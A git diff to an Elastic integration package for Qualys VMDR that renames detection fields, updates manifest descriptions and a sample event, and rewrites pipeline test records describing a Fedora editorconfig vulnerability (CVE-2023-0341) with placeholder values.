qualys_vmdr.asset_host_detection.list.SEVERITY - - qualys_vmdr.asset_host_detection.list.TIMES_FOUND - - qualys_vmdr.asset_host_detection.list.TIMES_REOPENED - - qualys_vmdr.asset_host_detection.list.IS_IGNORED + - qualys_vmdr.asset_host_detection.vulnerability.FIRST_FOUND_DATETIME + - qualys_vmdr.asset_host_detection.vulnerability.FIRST_REOPENED_DATETIME + - qualys_vmdr.asset_host_detection.vulnerability.IS_DISABLED + - qualys_vmdr.asset_host_detection.vulnerability.LAST_FOUND_DATETIME + - qualys_vmdr.asset_host_detection.vulnerability.LAST_REOPENED_DATETIME + - qualys_vmdr.asset_host_detection.vulnerability.LAST_PROCESSED_DATETIME + - qualys_vmdr.asset_host_detection.vulnerability.LAST_TEST_DATETIME + - qualys_vmdr.asset_host_detection.vulnerability.LAST_UPDATE_DATETIME + - qualys_vmdr.asset_host_detection.vulnerability.LAST_FIXED_DATETIME + - qualys_vmdr.asset_host_detection.vulnerability.PORT + - qualys_vmdr.asset_host_detection.vulnerability.QDS_FACTORS + - qualys_vmdr.asset_host_detection.vulnerability.SEVERITY + - qualys_vmdr.asset_host_detection.vulnerability.TIMES_FOUND + - qualys_vmdr.asset_host_detection.vulnerability.TIMES_REOPENED + - qualys_vmdr.asset_host_detection.vulnerability.IS_IGNORED - qualys_vmdr.asset_host_detection.cloud.provider.tags.cloud_tag.LAST_SUCCESS_DATE - qualys_vmdr.asset_host_detection.metadata.ec2.attribute.LAST_ERROR_DATE - qualys_vmdr.asset_host_detection.metadata.ec2.attribute.LAST_SUCCESS_DATE diff --git a/packages/qualys_vmdr/data_stream/asset_host_detection/fields/fields.yml b/packages/qualys_vmdr/data_stream/asset_host_detection/fields/fields.yml index cffc1054343..3f06756a3f4 100644 --- a/packages/qualys_vmdr/data_stream/asset_host_detection/fields/fields.yml +++ b/packages/qualys_vmdr/data_stream/asset_host_detection/fields/fields.yml @@ -70,7 +70,7 @@ type: date - name: scanned_duration type: long - - name: list + - name: vulnerability type: group fields: - name: affect 
@@ -156,6 +156,8 @@ type: long - name: type type: keyword + - name: unique_vuln_id + type: keyword - name: metadata type: group fields: diff --git a/packages/qualys_vmdr/data_stream/asset_host_detection/manifest.yml b/packages/qualys_vmdr/data_stream/asset_host_detection/manifest.yml index 7d0fe3a7d1b..df64cca6496 100644 --- a/packages/qualys_vmdr/data_stream/asset_host_detection/manifest.yml +++ b/packages/qualys_vmdr/data_stream/asset_host_detection/manifest.yml @@ -15,7 +15,9 @@ streams: - name: interval type: text title: Interval - description: "Interval between two REST API calls. User can choose interval as per their plan mentioned in [Qualys API Limits](https://www.qualys.com/docs/qualys-api-limits.pdf). Supported units for this parameter are h/m/s." + description: >- + Interval between two REST API calls. User can choose interval as per their plan mentioned in + [Qualys API Limits](https://www.qualys.com/docs/qualys-api-limits.pdf). Supported units for this parameter are h/m/s. default: 4h multi: false required: true @@ -23,7 +25,9 @@ streams: - name: batch_size type: integer title: Batch Size - description: "Batch size for the response of the Qualys Server API. This parameter specifies the truncation limit for the response. Specify 0 for no truncation limit." + description: >- + Batch size for the response of the Qualys Server API. This parameter specifies the truncation limit for the response. + Specify 0 for no truncation limit. default: 1000 multi: false required: true 
@@ -31,15 +35,19 @@ streams: - name: http_client_timeout type: text title: HTTP Client Timeout - description: "Duration before declaring that the HTTP client connection has timed out. Supported time units are ns, us, ms, s, m, h." + description: >- + Duration before declaring that the HTTP client connection has timed out. Give a timeout of more than 1 minute when + retrieving data which is more than 15 days old. Supported time units are ns, us, ms, s, m, h. Requests may take + significant time, so short timeouts are not recommended. multi: false required: true show_user: false - default: 30s + default: 10m - name: input_parameters type: text title: Input Parameters - description: "Input Parameters for the URL. param1=value¶m2=value¶m3=....*" + description: >- + Input Parameters for the URL. param1=value¶m2=value¶m3=....* multi: false required: false show_user: true diff --git a/packages/qualys_vmdr/data_stream/asset_host_detection/sample_event.json b/packages/qualys_vmdr/data_stream/asset_host_detection/sample_event.json index 70e16c7ac84..af0c7da8c11 100644 --- a/packages/qualys_vmdr/data_stream/asset_host_detection/sample_event.json +++ b/packages/qualys_vmdr/data_stream/asset_host_detection/sample_event.json @@ -1,11 +1,11 @@ { - "@timestamp": "2023-10-25T08:52:23.474Z", + "@timestamp": "2024-03-11T21:06:28.277Z", "agent": { - "ephemeral_id": "8365cc1b-0570-46a3-986b-eb86f03344d2", - "id": "50e7e437-d3fc-4872-8bd1-0da718796b4a", + "ephemeral_id": "798665d1-a592-4f07-8517-f7bdcdbda09f", + "id": "b7f7fd67-e199-4daf-b640-92e89c091cc6", "name": "docker-fleet-agent", "type": "filebeat", - "version": "8.9.0" + "version": "8.12.1" }, "data_stream": { "dataset": "qualys_vmdr.asset_host_detection", @@ -16,9 +16,9 @@ "version": "8.11.0" }, "elastic_agent": { - "id": "50e7e437-d3fc-4872-8bd1-0da718796b4a", + "id": "b7f7fd67-e199-4daf-b640-92e89c091cc6", "snapshot": false, - "version": "8.9.0" + "version": "8.12.1" }, "event": { "agent_id_status": "verified", 
@@ -26,7 +26,7 @@
"host"
],
"dataset": "qualys_vmdr.asset_host_detection",
- "ingested": "2023-10-25T08:52:26Z",
+ "ingested": "2024-03-11T21:06:40Z",
"kind": "alert",
"type": [
"info"
@@ -53,30 +53,58 @@
"scanned_duration": 1113
}
},
- "list": [
- {
- "first": {
- "found_datetime": "2023-06-28T06:04:26.000Z"
+ "tracking_method": "IP",
+ "vulnerability": {
+ "affect": {
+ "running": {
+ "kernel": "0"
+ }
+ },
+ "first": {
+ "found_datetime": "2021-02-05T04:50:45.000Z"
+ },
+ "is_disabled": false,
+ "is_ignored": false,
+ "last": {
+ "fixed_datetime": "2022-12-14T06:52:57.000Z",
+ "found_datetime": "2024-03-08T20:15:41.000Z",
+ "processed_datetime": "2024-03-08T20:15:41.000Z",
+ "test_datetime": "2024-03-08T20:15:41.000Z",
+ "update_datetime": "2024-03-08T20:15:41.000Z"
+ },
+ "qds": {
+ "severity": "LOW",
+ "text": "35"
+ },
+ "qds_factors": [
+ {
+ "name": "CVSS",
+ "text": "7.7"
},
- "is_disabled": false,
- "is_ignored": false,
- "last": {
- "found_datetime": "2023-07-03T06:23:47.000Z",
- "processed_datetime": "2023-07-03T06:25:17.000Z",
- "test_datetime": "2023-07-03T06:23:47.000Z",
- "update_datetime": "2023-07-03T06:25:17.000Z"
+ {
+ "name": "CVSS_version",
+ "text": "v3.x"
},
- "qid": "91681",
- "severity": 5,
- "ssl": "0",
- "status": "Active",
- "times": {
- "found": 11
+ {
+ "name": "epss",
+ "text": "0.00232"
},
- "type": "Confirmed"
- }
- ],
- "tracking_method": "IP"
+ {
+ "name": "CVSS_vector",
+ "text": "AV:N/AC:L/PR:L/UI:N/S:C/C:N/I:N/A:H"
+ }
+ ],
+ "qid": "197595",
+ "results": "Package Installed Version Required Version\nlinux-cloud-tools-4.4.0 1074-aws_4.4.0-1074.84 1092\nlinux-aws-tools-4.4.0 1074_4.4.0-1074.84 1092\nlinux-aws-headers-4.4.0 1074_4.15.0-1126.135 1092\nlinux-tools-4.4.0 1074-aws_4.4.0-1074.84 1092\nlinux-aws-cloud-tools-4.4.0 1074_4.4.0-1074.84 1092",
+ "severity": 3,
+ "ssl": "0",
+ "status": "Active",
+ "times": {
+ "found": 5393
+ },
+ "type": "Confirmed",
+ "unique_vuln_id": "5555555555"
+ }
}
},
"related": {
@@ -92,4 +120,4 @@ "forwarded", "qualys_vmdr-asset_host_detection" ] -} +} \ No newline at end of file diff --git a/packages/qualys_vmdr/data_stream/knowledge_base/_dev/test/pipeline/test-knowledge-base.log b/packages/qualys_vmdr/data_stream/knowledge_base/_dev/test/pipeline/test-knowledge-base.log index c77a3f15652..dced2a7948e 100644 --- a/packages/qualys_vmdr/data_stream/knowledge_base/_dev/test/pipeline/test-knowledge-base.log +++ b/packages/qualys_vmdr/data_stream/knowledge_base/_dev/test/pipeline/test-knowledge-base.log @@ -1,3 +1,3 @@ -{"VENDOR_REFERENCE_LIST": {"VENDOR_REFERENCE": {"ID": "ABCDEFG-2023-6e5d4757df","URL": "https://bodhi.fedoraproject.org/updates/ABCDEFG-2023-6e5d4757df"}},"THREAT_INTELLIGENCE": {"THREAT_INTEL": [{"#text": "Exploit_Public","id": "2"},{"#text": "High_Lateral_Movement","id": "4"}]},"VULN_TYPE": "Vulnerability","CONSEQUENCE": "Malicious users could use this vulnerability to change partial contents or configuration on the system. Additionally this vulnerability can also be used to cause a limited denial of service in the form of interruptions in resource availability.","CONSEQUENCE_COMMENT":"comment2","CVE_LIST": {"CVE": {"ID": "CVE-2023-0341","URL": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0341"}},"DETECTION_INFO":"info1","LAST_CUSTOMIZATION":{"DATETIME":"2023-06-06T06:02:48Z","USER_LOGIN":"user_login"},"BUGTRAQ_LIST":{"BUGTRAQ":{"ID":"123","URL":"https://www.bugtraq.com"}},"LAST_SERVICE_MODIFICATION_DATETIME": "2023-06-06T06:02:45Z","PCI_REASONS": {"PCI_REASON": "The QID adheres to the PCI requirements based on the CVSS basescore."},"DIAGNOSIS": "Fedora has released a security update for editorconfig to fix the vulnerabilities.

Affected OS:
Fedora 37


","DIAGNOSIS_COMMENT":"comment1","PUBLISHED_DATETIME": "2023-06-05T13:38:36Z","SEVERITY_LEVEL": "4","SUPPORTED_MODULES": "VM,CA-Linux Agent","PCI_FLAG": "0","SOFTWARE_LIST": {"SOFTWARE": {"PRODUCT": "editorconfig","VENDOR": "fedora"}},"CORRELATION": {"EXPLOITS": {"EXPLT_SRC": {"EXPLT_LIST": {"EXPLT": {"LINK": "https://litios.github.io/2023/01/14/CVE-2023-0341.html","REF": "CVE-2023-0341","DESC": "A stack buffer overflow exists in the ec_glob function of editorconfig-core-c before v0.12.6 which allowed an attacker to arbitrarily write to the stack and possibly allows remote code execution. editorconfig-core-c v0.12.6 resolved this vulnerability by bound checking all write operations over the p_pcre buffer."}},"SRC_NAME": "nvd"}}, "MALWARE":{"MW_SRC":{"SRC_NAME":"mw","MW_LIST":{"MW_INFO":{"MW_ID":"123","MW_TYPE":"ec_glob","MW_PLATFORM":"unknown","MW_ALIAS":"unknown","MW_RATING":"2","MW_LINK":"https://litios.github.io/2023/01/14/MW-2023-0341.html"}}}}},"CVSS":{"BASE":"base","TEMPORAL":"temporal","VECTOR_STRING":"vector1","ACCESS":{"VECTOR":"xy_1","COMPLEXITY":"medium"},"IMPACT":{"CONFIDENTIALITY":"high","INTEGRITY":"integrity","AVAILABILITY":"yes"},"AUTHENTICATION":"auth","EXPLOITABILITY":"exploit","REMEDIATION_LEVEL":"remedy","REPORT_CONFIDENCE":"level"},"CVSS_V3":{"BASE":"base","TEMPORAL":"temporal","VECTOR_STRING":"ax_vb","CVSS3_VERSION":"1.0.0","ATTACK":{"VECTOR":"ax_vb","COMPLEXITY":"hard"},"IMPACT":{"CONFIDENTIALITY":"confidential","INTEGRITY":"0","AVAILABILITY":"1"},"PRIVILEGES_REQUIRED":"userlevel","USER_INTERACTION":"interact","SCOPE":"4","EXPLOIT_CODE_MATURITY":"mature","REMEDIATION_LEVEL":"5","REPORT_CONFIDENCE":"confident"},"AUTOMATIC_PCI_FAIL":"fail","TITLE": "Fedora Security Update for editorconfig (ABCDEFG-2023-6e5d4757df)","PATCHABLE": "0","IS_DISABLED": "0","QID": "284008","CHANGE_LOG_LIST": {"CHANGE_LOG_INFO": [{"CHANGE_DATE": "2023-06-05T18:04:20Z","COMMENTS": "Real-time threat indicator \"High_Lateral_Movement\" added."},{"CHANGE_DATE": 
"2023-06-06T05:00:02Z","COMMENTS": "Exploit added."},{"CHANGE_DATE": "2023-06-06T05:00:02Z","COMMENTS": "CVSS V2 temporal score updated from \"4\" to \"4.3\"."},{"COMMENTS": "CVSS V3 temporal score updated from \"6.8\" to \"7\".","CHANGE_DATE": "2023-06-06T05:00:02Z"},{"CHANGE_DATE": "2023-06-06T06:02:45Z","COMMENTS": "Real-time threat indicator \"Exploit_Public\" added."}]},"CATEGORY": "Fedora","DISCOVERY": {"REMOTE": "0","ADDITIONAL_INFO": "Patch Available, Exploit Available","AUTH_TYPE_LIST": {"AUTH_TYPE": "Unix"}},"COMPLIANCE_LIST":{"COMPLIANCE":{"TYPE":"law","SECTION":"law_section","DESCRIPTION":"Not Provided"}},"SOLUTION_COMMENT":"comment3","SOLUTION": "Refer to Fedora security advisory Fedora 37 for updates and patch information.\n

Patch:
\nFollowing are links for downloading patches to fix the vulnerabilities:\n

ABCDEFG-2023-6e5d4757df:Fedora 37"} -{"VENDOR_REFERENCE_LIST": {"VENDOR_REFERENCE": {"ID": "ABCDEFG-2023-6e5d4757df","URL": "https://bodhi.fedoraproject.org/updates/ABCDEFG-2023-6e5d4757df"}},"THREAT_INTELLIGENCE": {"THREAT_INTEL": {"#text": "High_Lateral_Movement","id": "4"}},"VULN_TYPE": "Vulnerability","CONSEQUENCE": "Malicious users could use this vulnerability to change partial contents or configuration on the system. Additionally this vulnerability can also be used to cause a limited denial of service in the form of interruptions in resource availability.","CVE_LIST": {"CVE": {"ID": "CVE-2023-0341","URL": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0341"}},"LAST_SERVICE_MODIFICATION_DATETIME": "2023-06-06T06:02:45Z","PCI_REASONS": {"PCI_REASON": "The QID adheres to the PCI requirements based on the CVSS basescore."},"DIAGNOSIS": "Fedora has released a security update for editorconfig to fix the vulnerabilities.

Affected OS:
Fedora 37


","PUBLISHED_DATETIME": "2023-06-05T13:38:36Z","SEVERITY_LEVEL": "5","SUPPORTED_MODULES": "VM,CA-Linux Agent","PCI_FLAG": "0","SOFTWARE_LIST": {"SOFTWARE": {"PRODUCT": "editorconfig","VENDOR": "fedora"}},"CORRELATION": {"EXPLOITS": {"EXPLT_SRC": {"EXPLT_LIST": {"EXPLT": {"LINK": "https://litios.github.io/2023/01/14/CVE-2023-0341.html","REF": "CVE-2023-0341","DESC": "A stack buffer overflow exists in the ec_glob function of editorconfig-core-c before v0.12.6 which allowed an attacker to arbitrarily write to the stack and possibly allows remote code execution. editorconfig-core-c v0.12.6 resolved this vulnerability by bound checking all write operations over the p_pcre buffer."}},"SRC_NAME": "nvd"}}},"TITLE": "Fedora Security Update for editorconfig (ABCDEFG-2023-6e5d4757df)","PATCHABLE": "0","IS_DISABLED": "0","QID": "284008","CHANGE_LOG_LIST": {"CHANGE_LOG_INFO": {"CHANGE_DATE": "2023-06-05T18:04:20Z","COMMENTS": "Real-time threat indicator \"High_Lateral_Movement\" added."}},"CATEGORY": "Fedora","DISCOVERY": {"REMOTE": "0","ADDITIONAL_INFO": "Patch Available, Exploit Available","AUTH_TYPE_LIST": {"AUTH_TYPE": "Unix"}},"SOLUTION": "Refer to Fedora security advisory Fedora 37 for updates and patch information.\n

Patch:
\nFollowing are links for downloading patches to fix the vulnerabilities:\n

ABCDEFG-2023-6e5d4757df:Fedora 37"} -{"VENDOR_REFERENCE_LIST": {"VENDOR_REFERENCE": {"ID": "ABCDEFG-2023-6e5d4757df","URL": "https://bodhi.fedoraproject.org/updates/ABCDEFG-2023-6e5d4757df"}},"THREAT_INTELLIGENCE": {"THREAT_INTEL": [{"#text": "Exploit_Public","id": "2"},{"#text": "High_Lateral_Movement","id": "4"}]},"VULN_TYPE": "Vulnerability","CONSEQUENCE": "Malicious users could use this vulnerability to change partial contents or configuration on the system. Additionally this vulnerability can also be used to cause a limited denial of service in the form of interruptions in resource availability.","CONSEQUENCE_COMMENT":"comment2","CVE_LIST": {"CVE": {"ID": "CVE-2023-0341","URL": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0341"}},"DETECTION_INFO":"info1","LAST_CUSTOMIZATION":{"DATETIME":"2023-06-06T06:02:48Z","USER_LOGIN":"user_login"},"BUGTRAQ_LIST":{"BUGTRAQ":{"ID":"123","URL":"https://www.bugtraq.com"}},"LAST_SERVICE_MODIFICATION_DATETIME": "2023-06-06T06:02:45Z","PCI_REASONS": {"PCI_REASON": "The QID adheres to the PCI requirements based on the CVSS basescore."},"DIAGNOSIS": "Fedora has released a security update for editorconfig to fix the vulnerabilities.

Affected OS:
Fedora 37


","DIAGNOSIS_COMMENT":"comment1","PUBLISHED_DATETIME": "2023-06-05T13:38:36Z","SEVERITY_LEVEL": "4","SUPPORTED_MODULES": "VM,CA-Linux Agent","PCI_FLAG": "0","SOFTWARE_LIST": {"SOFTWARE": {"PRODUCT": "editorconfig","VENDOR": "fedora"}},"CORRELATION": {"EXPLOITS": {"EXPLT_SRC": {"EXPLT_LIST": {"EXPLT": {"LINK": "https://litios.github.io/2023/01/14/CVE-2023-0341.html","REF": "CVE-2023-0341","DESC": "A stack buffer overflow exists in the ec_glob function of editorconfig-core-c before v0.12.6 which allowed an attacker to arbitrarily write to the stack and possibly allows remote code execution. editorconfig-core-c v0.12.6 resolved this vulnerability by bound checking all write operations over the p_pcre buffer."}},"SRC_NAME": "nvd"}}, "MALWARE":{"MW_SRC":{"SRC_NAME":"mw","MW_LIST":{"MW_INFO":{"MW_ID":"123","MW_TYPE":"ec_glob","MW_PLATFORM":"unknown","MW_ALIAS":"unknown","MW_RATING":"2","MW_LINK":"https://litios.github.io/2023/01/14/MW-2023-0341.html"}}}}},"CVSS":{"BASE":{"#text": "5.4", "source":"service"},"TEMPORAL":"temporal","VECTOR_STRING":"vector1","ACCESS":{"VECTOR":"xy_1","COMPLEXITY":"medium"},"IMPACT":{"CONFIDENTIALITY":"high","INTEGRITY":"integrity","AVAILABILITY":"yes"},"AUTHENTICATION":"auth","EXPLOITABILITY":"exploit","REMEDIATION_LEVEL":"remedy","REPORT_CONFIDENCE":"level"},"CVSS_V3":{"BASE":"base","TEMPORAL":"temporal","VECTOR_STRING":"ax_vb","CVSS3_VERSION":"1.0.0","ATTACK":{"VECTOR":"ax_vb","COMPLEXITY":"hard"},"IMPACT":{"CONFIDENTIALITY":"confidential","INTEGRITY":"0","AVAILABILITY":"1"},"PRIVILEGES_REQUIRED":"userlevel","USER_INTERACTION":"interact","SCOPE":"4","EXPLOIT_CODE_MATURITY":"mature","REMEDIATION_LEVEL":"5","REPORT_CONFIDENCE":"confident"},"AUTOMATIC_PCI_FAIL":"fail","TITLE": "Fedora Security Update for editorconfig (ABCDEFG-2023-6e5d4757df)","PATCHABLE": "0","IS_DISABLED": "0","QID": "284008","CHANGE_LOG_LIST": {"CHANGE_LOG_INFO": [{"CHANGE_DATE": "2023-06-05T18:04:20Z","COMMENTS": "Real-time threat indicator \"High_Lateral_Movement\" 
added."},{"CHANGE_DATE": "2023-06-06T05:00:02Z","COMMENTS": "Exploit added."},{"CHANGE_DATE": "2023-06-06T05:00:02Z","COMMENTS": "CVSS V2 temporal score updated from \"4\" to \"4.3\"."},{"COMMENTS": "CVSS V3 temporal score updated from \"6.8\" to \"7\".","CHANGE_DATE": "2023-06-06T05:00:02Z"},{"CHANGE_DATE": "2023-06-06T06:02:45Z","COMMENTS": "Real-time threat indicator \"Exploit_Public\" added."}]},"CATEGORY": "Fedora","DISCOVERY": {"REMOTE": "0","ADDITIONAL_INFO": "Patch Available, Exploit Available","AUTH_TYPE_LIST": {"AUTH_TYPE": "Unix"}},"COMPLIANCE_LIST":{"COMPLIANCE":{"TYPE":"law","SECTION":"law_section","DESCRIPTION":"Not Provided"}},"SOLUTION_COMMENT":"comment3","SOLUTION": "Refer to Fedora security advisory Fedora 37 for updates and patch information.\n

Patch:
\nFollowing are links for downloading patches to fix the vulnerabilities:\n

ABCDEFG-2023-6e5d4757df:Fedora 37"} +{"VENDOR_REFERENCE_LIST": {"VENDOR_REFERENCE": {"ID": "ABCDEFG-2023-6e5d4757df","URL": "https://bodhi.fedoraproject.org/updates/ABCDEFG-2023-6e5d4757df"}},"THREAT_INTELLIGENCE": {"THREAT_INTEL": [{"#text": "Exploit_Public","id": "2"},{"#text": "High_Lateral_Movement","id": "4"}]},"VULN_TYPE": "Vulnerability","CONSEQUENCE": "Malicious users could use this vulnerability to change partial contents or configuration on the system. Additionally this vulnerability can also be used to cause a limited denial of service in the form of interruptions in resource availability.","CONSEQUENCE_COMMENT":"comment2","CVE_LIST": ["CVE-2023-0341"],"DETECTION_INFO":"info1","LAST_CUSTOMIZATION":{"DATETIME":"2023-06-06T06:02:48Z","USER_LOGIN":"user_login"},"BUGTRAQ_LIST":{"BUGTRAQ":{"ID":"123","URL":"https://www.bugtraq.com"}},"LAST_SERVICE_MODIFICATION_DATETIME": "2023-06-06T06:02:45Z","PCI_REASONS": {"PCI_REASON": "The QID adheres to the PCI requirements based on the CVSS basescore."},"DIAGNOSIS": "Fedora has released a security update for editorconfig to fix the vulnerabilities.

Affected OS:
Fedora 37


","DIAGNOSIS_COMMENT":"comment1","PUBLISHED_DATETIME": "2023-06-05T13:38:36Z","SEVERITY_LEVEL": "4","SUPPORTED_MODULES": "VM,CA-Linux Agent","PCI_FLAG": "0","SOFTWARE_LIST": {"SOFTWARE": {"PRODUCT": "editorconfig","VENDOR": "fedora"}},"CORRELATION": {"EXPLOITS": {"EXPLT_SRC": {"EXPLT_LIST": {"EXPLT": {"LINK": "https://litios.github.io/2023/01/14/CVE-2023-0341.html","REF": "CVE-2023-0341","DESC": "A stack buffer overflow exists in the ec_glob function of editorconfig-core-c before v0.12.6 which allowed an attacker to arbitrarily write to the stack and possibly allows remote code execution. editorconfig-core-c v0.12.6 resolved this vulnerability by bound checking all write operations over the p_pcre buffer."}},"SRC_NAME": "nvd"}}, "MALWARE":{"MW_SRC":{"SRC_NAME":"mw","MW_LIST":{"MW_INFO":{"MW_ID":"123","MW_TYPE":"ec_glob","MW_PLATFORM":"unknown","MW_ALIAS":"unknown","MW_RATING":"2","MW_LINK":"https://litios.github.io/2023/01/14/MW-2023-0341.html"}}}}},"CVSS":{"BASE":"base","TEMPORAL":"temporal","VECTOR_STRING":"vector1","ACCESS":{"VECTOR":"xy_1","COMPLEXITY":"medium"},"IMPACT":{"CONFIDENTIALITY":"high","INTEGRITY":"integrity","AVAILABILITY":"yes"},"AUTHENTICATION":"auth","EXPLOITABILITY":"exploit","REMEDIATION_LEVEL":"remedy","REPORT_CONFIDENCE":"level"},"CVSS_V3":{"BASE":"base","TEMPORAL":"temporal","VECTOR_STRING":"ax_vb","CVSS3_VERSION":"1.0.0","ATTACK":{"VECTOR":"ax_vb","COMPLEXITY":"hard"},"IMPACT":{"CONFIDENTIALITY":"confidential","INTEGRITY":"0","AVAILABILITY":"1"},"PRIVILEGES_REQUIRED":"userlevel","USER_INTERACTION":"interact","SCOPE":"4","EXPLOIT_CODE_MATURITY":"mature","REMEDIATION_LEVEL":"5","REPORT_CONFIDENCE":"confident"},"AUTOMATIC_PCI_FAIL":"fail","TITLE": "Fedora Security Update for editorconfig (ABCDEFG-2023-6e5d4757df)","PATCHABLE": "0","IS_DISABLED": "0","QID": "284008","CHANGE_LOG_LIST": {"CHANGE_LOG_INFO": [{"CHANGE_DATE": "2023-06-05T18:04:20Z","COMMENTS": "Real-time threat indicator \"High_Lateral_Movement\" added."},{"CHANGE_DATE": 
"2023-06-06T05:00:02Z","COMMENTS": "Exploit added."},{"CHANGE_DATE": "2023-06-06T05:00:02Z","COMMENTS": "CVSS V2 temporal score updated from \"4\" to \"4.3\"."},{"COMMENTS": "CVSS V3 temporal score updated from \"6.8\" to \"7\".","CHANGE_DATE": "2023-06-06T05:00:02Z"},{"CHANGE_DATE": "2023-06-06T06:02:45Z","COMMENTS": "Real-time threat indicator \"Exploit_Public\" added."}]},"CATEGORY": "Fedora","DISCOVERY": {"REMOTE": "0","ADDITIONAL_INFO": "Patch Available, Exploit Available","AUTH_TYPE_LIST": {"AUTH_TYPE": "Unix"}},"COMPLIANCE_LIST":{"COMPLIANCE":{"TYPE":"law","SECTION":"law_section","DESCRIPTION":"Not Provided"}},"SOLUTION_COMMENT":"comment3","SOLUTION": "Refer to Fedora security advisory Fedora 37 for updates and patch information.\n

Patch:
\nFollowing are links for downloading patches to fix the vulnerabilities:\n

ABCDEFG-2023-6e5d4757df:Fedora 37"} +{"VENDOR_REFERENCE_LIST": {"VENDOR_REFERENCE": {"ID": "ABCDEFG-2023-6e5d4757df","URL": "https://bodhi.fedoraproject.org/updates/ABCDEFG-2023-6e5d4757df"}},"THREAT_INTELLIGENCE": {"THREAT_INTEL": {"#text": "High_Lateral_Movement","id": "4"}},"VULN_TYPE": "Vulnerability","CONSEQUENCE": "Malicious users could use this vulnerability to change partial contents or configuration on the system. Additionally this vulnerability can also be used to cause a limited denial of service in the form of interruptions in resource availability.","CVE_LIST": ["CVE-2023-0341"],"LAST_SERVICE_MODIFICATION_DATETIME": "2023-06-06T06:02:45Z","PCI_REASONS": {"PCI_REASON": "The QID adheres to the PCI requirements based on the CVSS basescore."},"DIAGNOSIS": "Fedora has released a security update for editorconfig to fix the vulnerabilities.

Affected OS:
Fedora 37


","PUBLISHED_DATETIME": "2023-06-05T13:38:36Z","SEVERITY_LEVEL": "5","SUPPORTED_MODULES": "VM,CA-Linux Agent","PCI_FLAG": "0","SOFTWARE_LIST": {"SOFTWARE": {"PRODUCT": "editorconfig","VENDOR": "fedora"}},"CORRELATION": {"EXPLOITS": {"EXPLT_SRC": {"EXPLT_LIST": {"EXPLT": {"LINK": "https://litios.github.io/2023/01/14/CVE-2023-0341.html","REF": "CVE-2023-0341","DESC": "A stack buffer overflow exists in the ec_glob function of editorconfig-core-c before v0.12.6 which allowed an attacker to arbitrarily write to the stack and possibly allows remote code execution. editorconfig-core-c v0.12.6 resolved this vulnerability by bound checking all write operations over the p_pcre buffer."}},"SRC_NAME": "nvd"}}},"TITLE": "Fedora Security Update for editorconfig (ABCDEFG-2023-6e5d4757df)","PATCHABLE": "0","IS_DISABLED": "0","QID": "284008","CHANGE_LOG_LIST": {"CHANGE_LOG_INFO": {"CHANGE_DATE": "2023-06-05T18:04:20Z","COMMENTS": "Real-time threat indicator \"High_Lateral_Movement\" added."}},"CATEGORY": "Fedora","DISCOVERY": {"REMOTE": "0","ADDITIONAL_INFO": "Patch Available, Exploit Available","AUTH_TYPE_LIST": {"AUTH_TYPE": "Unix"}},"SOLUTION": "Refer to Fedora security advisory Fedora 37 for updates and patch information.\n

Patch:
\nFollowing are links for downloading patches to fix the vulnerabilities:\n

ABCDEFG-2023-6e5d4757df:Fedora 37"} +{"VENDOR_REFERENCE_LIST": {"VENDOR_REFERENCE": {"ID": "ABCDEFG-2023-6e5d4757df","URL": "https://bodhi.fedoraproject.org/updates/ABCDEFG-2023-6e5d4757df"}},"THREAT_INTELLIGENCE": {"THREAT_INTEL": [{"#text": "Exploit_Public","id": "2"},{"#text": "High_Lateral_Movement","id": "4"}]},"VULN_TYPE": "Vulnerability","CONSEQUENCE": "Malicious users could use this vulnerability to change partial contents or configuration on the system. Additionally this vulnerability can also be used to cause a limited denial of service in the form of interruptions in resource availability.","CONSEQUENCE_COMMENT":"comment2","CVE_LIST": ["CVE-2023-0341"],"DETECTION_INFO":"info1","LAST_CUSTOMIZATION":{"DATETIME":"2023-06-06T06:02:48Z","USER_LOGIN":"user_login"},"BUGTRAQ_LIST":{"BUGTRAQ":{"ID":"123","URL":"https://www.bugtraq.com"}},"LAST_SERVICE_MODIFICATION_DATETIME": "2023-06-06T06:02:45Z","PCI_REASONS": {"PCI_REASON": "The QID adheres to the PCI requirements based on the CVSS basescore."},"DIAGNOSIS": "Fedora has released a security update for editorconfig to fix the vulnerabilities.

Affected OS:
Fedora 37


","DIAGNOSIS_COMMENT":"comment1","PUBLISHED_DATETIME": "2023-06-05T13:38:36Z","SEVERITY_LEVEL": "4","SUPPORTED_MODULES": "VM,CA-Linux Agent","PCI_FLAG": "0","SOFTWARE_LIST": {"SOFTWARE": {"PRODUCT": "editorconfig","VENDOR": "fedora"}},"CORRELATION": {"EXPLOITS": {"EXPLT_SRC": {"EXPLT_LIST": {"EXPLT": {"LINK": "https://litios.github.io/2023/01/14/CVE-2023-0341.html","REF": "CVE-2023-0341","DESC": "A stack buffer overflow exists in the ec_glob function of editorconfig-core-c before v0.12.6 which allowed an attacker to arbitrarily write to the stack and possibly allows remote code execution. editorconfig-core-c v0.12.6 resolved this vulnerability by bound checking all write operations over the p_pcre buffer."}},"SRC_NAME": "nvd"}}, "MALWARE":{"MW_SRC":{"SRC_NAME":"mw","MW_LIST":{"MW_INFO":{"MW_ID":"123","MW_TYPE":"ec_glob","MW_PLATFORM":"unknown","MW_ALIAS":"unknown","MW_RATING":"2","MW_LINK":"https://litios.github.io/2023/01/14/MW-2023-0341.html"}}}}},"CVSS":{"BASE":{"#text": "5.4", "source":"service"},"TEMPORAL":"temporal","VECTOR_STRING":"vector1","ACCESS":{"VECTOR":"xy_1","COMPLEXITY":"medium"},"IMPACT":{"CONFIDENTIALITY":"high","INTEGRITY":"integrity","AVAILABILITY":"yes"},"AUTHENTICATION":"auth","EXPLOITABILITY":"exploit","REMEDIATION_LEVEL":"remedy","REPORT_CONFIDENCE":"level"},"CVSS_V3":{"BASE":"base","TEMPORAL":"temporal","VECTOR_STRING":"ax_vb","CVSS3_VERSION":"1.0.0","ATTACK":{"VECTOR":"ax_vb","COMPLEXITY":"hard"},"IMPACT":{"CONFIDENTIALITY":"confidential","INTEGRITY":"0","AVAILABILITY":"1"},"PRIVILEGES_REQUIRED":"userlevel","USER_INTERACTION":"interact","SCOPE":"4","EXPLOIT_CODE_MATURITY":"mature","REMEDIATION_LEVEL":"5","REPORT_CONFIDENCE":"confident"},"AUTOMATIC_PCI_FAIL":"fail","TITLE": "Fedora Security Update for editorconfig (ABCDEFG-2023-6e5d4757df)","PATCHABLE": "0","IS_DISABLED": "0","QID": "284008","CHANGE_LOG_LIST": {"CHANGE_LOG_INFO": 